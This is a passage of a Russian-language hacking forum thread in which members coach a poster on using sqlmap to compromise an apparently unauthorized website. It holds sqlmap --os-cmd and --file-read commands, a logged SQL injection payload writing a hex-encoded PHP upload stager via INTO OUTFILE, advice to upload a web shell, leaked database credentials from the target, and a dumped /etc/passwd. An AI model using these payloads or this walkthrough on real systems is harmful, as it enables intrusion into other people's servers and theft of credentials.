Старый 04.02.2012, 14:18   #21
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

а я в tmp и не заливаю, как ты видишь у меня другой путь до эвил файла
Shadowfolder вне форума   Ответить с цитированием
Старый 04.02.2012, 16:00   #22
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

>
Цитата:
а когда в /tmp/ заливаешь,такой ошибки нет?И файл потом читается через ридфайл?
<
Цитата:
а я в tmp и не заливаю, как ты видишь у меня другой путь до эвил файла
позволю себе повториться

================================================== =============
Режим "не убий" включен:

ТС,попробуй залить файл 777.txt,в котором будет слово popong в директорию /tmp через sqlmap и посмотри,выведет ли sqlmap ошибку.А потом попробуй прочесть этот файл(/tmp/777.txt) через sqlmap.Выложи сюда результаты.
хух.
snake вне форума   Ответить с цитированием
Старый 04.02.2012, 18:54   #23
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Путь до сайта есть?! Хоть какая нибудь ошибка инклуда??? /var/user/site/www/includes/module/qwerty.php

тогда найди в хтмл-исходниках папку которая разрешена для записи (к примеру с картинками. или с аватарами. или cache форума/блога) и тогда

python sqlmap.py -u "http://qwe" --os-cmd "pwd" -v 3

1) потребуется ввести путь до веб-сервера (ты вводишь путь до папки с 777) /var/user/site/www/forum/cache/
2) далее потребуется ввести путь папки разрешенной на запись (ты вводишь тот же путь до папки с 777) /var/user/site/www/forum/cache/
т.к. стоит -v 3 то ты будешь видеть некоторый лог sqlmap. В частоности попытка загрузки 200-250 байтной формы загрузки. Лог примерно будет выглядеть вот так:
Код:
[20:52:15] [PAYLOAD] 36' LIMIT 1 INTO OUTFILE '/var/user/site/www/forum/cache/tmpuybpt.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a -- AND 'ZIsE'='ZIsE
ты пробуешь
site.ru/forum/cache/tmpuybpt.php

собстенно путь с файлом я в коде выделил - так вот если запись произошла, то введи урл этого файла - и в самом низу увидишь форму загрузки(то есть запись возможна!)...через нее уже и закинь свой 65КБ шелл
dumb вне форума   Ответить с цитированием
Старый 04.02.2012, 19:46   #24
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

с заливкой в temp тоже такая ошибка =( [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
dumb, не...там нельзя ничего загружать, даже аватарку.это не не форум и не блог, а просто сайт.
у меня вот, что выводит на странице если перейти с www.site.com/com/news.php?catid=123 на www.site.com/com/news.php
Код:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/htdocs/com/news.php on line 222
бродя по сайту и скачивая различные файлы, я нашёл пассы к mysql

PHP код:
// setup database connection
//DB Connection Parameters
$db_server="localhost";
$db_name="userq";
$db_user="userq";
$db_passwd="12345"
есть один пхп ipconfig
PHP код:
$host "192.168.0.118";
$path "/";
$port "81";
$prot "http";


$mysql_host "localhost";
$mysql_user "root";
$mysql_pass "12345";
$mysql_database "dabase01"
пробовал подключится через mysql,sqlyog на айпи сайта и порт 3306 не вышло =/
может как то можно узнать путь до файлов через etc/passwd что даст хоть какие то конфигурационные файлы, например пароли фтп...?


Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
mysql:x:60:102:MySQL database admin:/var/lib/mysql:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
ntp:x:74:65534:NTP daemon:/var/lib/ntp:/bin/false
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:101:103:User for haldaemon:/var/run/hal:/bin/false
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
supportleute:x:1000:100:supportleute:/home/supportleute:/bin/bash
htmlschieber:x:1001:100:Web FTP Benutzer:/srv/www/htdocs:/bin/bash
Shadowfolder вне форума   Ответить с цитированием
Старый 04.02.2012, 19:54   #25
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

в /tmp так же заливай как я тебе описал!
--file-write --file-desct хреново работают! я их некогда не юзал!

Пробуй так:
1) sqlmap.py -u "site" --os-cmd 'pwd' -v 3
2) укажешь 2 раза в качестве путей папку /tmp/ (именно так, с первым и последнем слешами!)
3) глянешь лог
Код:
[20:52:15] [PAYLOAD] 36' LIMIT 1 INTO OUTFILE '/tmp/tmpuybpt.php' LINES ......
4) sqlmap.py -u "site" --file-read "/tmp/tmpuybpt.php"
5) и если файл /tmp/tmpuybpt.php скачался - то в tmp запись точно есть!

или скинь ты урл - если нет ни блога, ни форума, никаких загрузок - какой-нить одностраничник пхп-шный?!
dumb вне форума   Ответить с цитированием
Старый 04.02.2012, 20:37   #26
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

в tmp ничего не качает.
но в других например /srv/www/htdocs/com/jek.php /srv/www/htdocs/com/admin/strukture.php их прекрасно качает, но запись туда никак не выходит
Shadowfolder вне форума   Ответить с цитированием
Старый 04.02.2012, 21:10   #27
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Попытаюсь объяснить логику, как подобрать врайтабельную диру.
при ошибке Can't create/write to file '/bla/bla' (Errcode: 13), означает папка не врайтабельна перебираем, все известные папки и пробуем.
при ошибке Can't create/write to file '/bla/bla' (Errcode: 17), означает запись в файл, который существует, пробуем другое название файла (шелла).
Это все под ситуацию руками, как в sqlmap я не знаю даже, что сказать.
Lostnull вне форума   Ответить с цитированием
Старый 04.02.2012, 22:16   #28
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

беда...
Цитата:
"с заливкой в temp тоже такая ошибка =( [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path"
snake вне форума   Ответить с цитированием
Старый 05.02.2012, 22:40   #29
vityab77
 
Регистрация: 05.02.2012
Сообщений: 0
Репутация: 0
По умолчанию

Привет!

У меня другая проблема с ключами --os-cmd и --os-shell

sqlmap>sqlmap.py -u "http://sub.site.ru/file.php?cid=2" --os-cmd cid -v 3
два раза указываю путь до папки temp(777) /home/webmaster/www/site.ru/htdocs/tmp/

Получаю

23:28:13] [PAYLOAD] 2 LIMIT 1 INTO OUTFILE '/home/webmaster/www/site.ru/htd
ocs/tmp/tmpusrfo.php' LINES TERMINATED BY 0x3c3f706e.....0a --
[23:28:14] [DEBUG] got HTTP error code: 404 (Not Found)
[23:28:14] [WARNING] unable to upload the file stager on '/home/webmaster/www/site.ru/htdocs/tmp'


C --os-shell такая же байда...

Как быть, подскажите, плииииииииииз!
vityab77 вне форума   Ответить с цитированием
Старый 06.02.2012, 10:21   #30
madnet
 
Аватар для madnet
 
Регистрация: 21.09.2010
Сообщений: 5
Репутация: 1
По умолчанию

Цитата:
Сообщение от vityab77 Посмотреть сообщение
Как быть, подскажите, плииииииииииз!
Похоже не хватает прав на запись в папку.
Проверь есть ли в принципе права на запись, если да, ищи папку с правами, доступную с веба
madnet вне форума   Ответить с цитированием
Ответ

Метки
sqlmap для новичков, sqlmap shell

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot